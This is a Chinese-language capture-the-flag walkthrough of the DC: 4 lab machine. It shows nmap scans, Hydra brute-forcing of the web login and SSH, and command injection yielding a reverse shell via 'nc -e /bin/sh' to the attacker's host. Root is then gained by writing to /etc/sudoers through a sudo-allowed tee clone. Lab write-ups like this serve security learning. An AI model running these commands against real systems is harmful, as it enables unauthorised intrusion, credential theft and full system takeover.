DC 系列已經完成 4/9,應該有機會在年前將整個系列結束掉,目前題目水平都還算入門,解題過程大概就算是複習打穩基礎吧,對於 DC: 4 解題的過程,也接觸到平常比較少碰到的工具,如:Hydra、wfuzz 等…。
環境設定
VirtualBox: Kali & DC: 4
Net Config: NAT Network
尋找靶機
$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 09:59 CST
Nmap scan report for 10.0.2.1
Host is up (0.0052s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0016s latency).
Nmap scan report for 10.0.2.7
Host is up (0.0023s latency).
Nmap scan report for 10.0.2.15
Host is up (0.0011s latency).
$ nmap 10.0.2.7 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 10:00 CST
Nmap scan report for 10.0.2.7
Host is up (0.0024s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
解題過程
直接瀏覽 80 Port 是一個缺乏美感的登入頁面,透過檢視頁面原始碼的方式,確認該頁面只是一個簡單的 Form base 功能頁,並且手動測測簡單的弱密碼未果。
目錄爆破
目錄爆破過後沒有什麼有趣的發現,僅有一開始首頁上麼登入功能可以嘗試。
$ python3 dirsearch.py -u http://10.0.2.7/ -w db/all.txt -e *
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 86760
Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-02-02_10-16-53.log
Target: http://10.0.2.7/
[10:16:53] Starting:
[10:17:02] 403 - 170B - /images/
[10:17:12] 403 - 556B - /css/
[10:17:56] 200 - 506B - /index.php
[10:19:03] 302 - 704B - /command.php -> index.php
[10:19:04] 302 - 206B - /login.php -> index.php
[10:20:43] 302 - 163B - /logout.php -> index.php
Task Completed
嘗試登入
除了一開始使用簡單的弱密碼嘗試以外,也使用簡單的 SQL Injection 嘗試登入,但都無法成功,最後使用 THC-Hydra 來進行爆破並成功登入 admin/happy。
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.0.2.7 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-02 10:30:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.0.2.7:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 10.0.2.7 login: admin password: happy
[STATUS] attack finished for 10.0.2.7 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
使用 THC-Hydra 的過程中卡了好長一段時間,由於對工具不熟悉,該登入有登入失敗不回顯的問題,最後參考 brute-forcing-passwords-with-thc-hydra 內文中提及的 condition string 可以使用 S= 來判斷登入後的字串, 可以看見參數後方 S=logout 就是預先假設登入後可以看到登出的字串,至於 -F 則是成功早出第一組符合條件的組合即停止。
Get Shell
登入之後可以看見只有一個功能 Command,與當時情報蒐集時的目錄爆破得到的功能路徑相同。
功能中有三個選項,簡單操作並觀察輸出,很清楚明白這是系統上的資訊直接輸出到頁面上。
試著打開瀏覽器的開發者工具觀察送出的資料,發現更多驚喜,先不論是否有進行過濾,光看就看得出這是一個非常不安全的程式。
由於 radio 的值是可以控制的,這也意味有機會 RCE(Remote Code Execution) 並丟一個 Reverse shell 回來,
Listen
nc -nl -vv -p 8080
victim
nc%20-e%20%2Fbin%2Fsh%2010.0.2.15%208080
nc -e /bin/sh 10.0.2.15 8080
提權
取得 Reverse shell 後,透過 python 取得一個可以交互的 shell,並嘗試蒐集更多資訊。
python -c "import pty;pty.spawn('/bin/bash')"
SUID check
www-data@dc-4:/$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
Linux exploit sugester
原先都會查看 uname -a、lsb_release -a 等資訊,現在找到一個好工具 linux-exploit-suggester,可以快速取得系統資訊,並分析出可能存在的 Exploit。
www-data@dc-4:/tmp$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
www-data@dc-4:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 4.9.0
Architecture: i686
Distribution: debian
Distribution version: 9
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
74 kernel space exploits
45 user space exploits
Possible Exploits:
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-10149] raptor_exim_wiz
Details: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
Exposure: less probable
Download URL: https://www.exploit-db.com/download/46996
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
但對該部分提權似乎沒有什麼幫助,透過觀察 passwd 發現系統上有三個使用者 charles、jim、sam,看看是否可以再透過 THC-Hydra 爆破成功。
hydra -s 22 -v -l charles -P /usr/share/wordlists/rockyou.txt 10.0.2.7 ssh
由於 rockyou.txt 太大包了,這三個帳號各跑了大概 10 分鐘就放棄了,最後嘗試在系統上找找有沒有其他資訊時,透過 find 找到 jim 使用者底下有個 old-passwords.bak 檔案,像是一個密碼字典檔。
www-data@dc-4:~$ find / -name *.bak 2>&1 | grep -v "Permission denied"
/home/jim/backups/old-passwords.bak
www-data@dc-4:~$ cat /home/jim/backups/old-passwords.bak
000000
12345
iloveyou
...
123456k
icecream
popcorn1
於是就接管這個密碼字典檔,透過 SSH 使用 THC-Hydra 進行爆破,並成功得到密碼 jibril04。
$ hydra -s 22 -v -l jim -P dc4_jim_password_list.txt 10.0.2.7 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-02 14:38:52
[DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
[DATA] attacking ssh://10.0.2.7:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://jim@10.0.2.7:22
[INFO] Successful, password authentication is supported by ssh://10.0.2.7:22
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 77 to do in 00:01h, 16 active
[VERBOSE] Retrying connection for child 11
[22][ssh] host: 10.0.2.7 login: jim password: jibril04
[STATUS] attack finished for 10.0.2.7 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-02 14:40:25
Login via SSH
在本機端使用 ssh 登入成功,並且開始探勘,其中登入後有一句話令我好奇 You have mail,由於對於 Linux 不熟,不知道這是登入後的罐頭訊息,還是真的需要到哪收信…。
$ ssh jim@10.0.2.7
The authenticity of host '10.0.2.7 (10.0.2.7)' can't be established.
ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.7' (ECDSA) to the list of known hosts.
jim@10.0.2.7's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
接著在 /var/mail/jim 發現信件,並且可以 cat 查看內容。
jim@dc-4:~$ cat /var/mail/jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
透過 teehee 提權
看來取得 charles 帳戶的密碼了,透過 su charles 直接切換帳戶,並在 sudo -l 發現 /usr/bin/teehee。
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
不清楚 teehee 是隻怎麼樣的程式,可以先透過 teehee –help 查看相關資訊。
charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
看起來就只是單純 echo 的程式,但似乎可以用來寫檔,於是腦筋動到了 sudoers 上,這部分也卡了一小段時間,原因是在 ALL=(ALL:ALL) 的括號不小心打成大括號 {},直接 sudo 掛掉,重佈幾次靶機。
charles@dc-4:~$ echo -en "charles ALL=(ALL:ALL) ALL" | sudo teehee /etc/sudoers
charles@dc-4:~$ sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for charles:
root@dc-4:/home/charles# whoami
root
root@dc-4:~# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.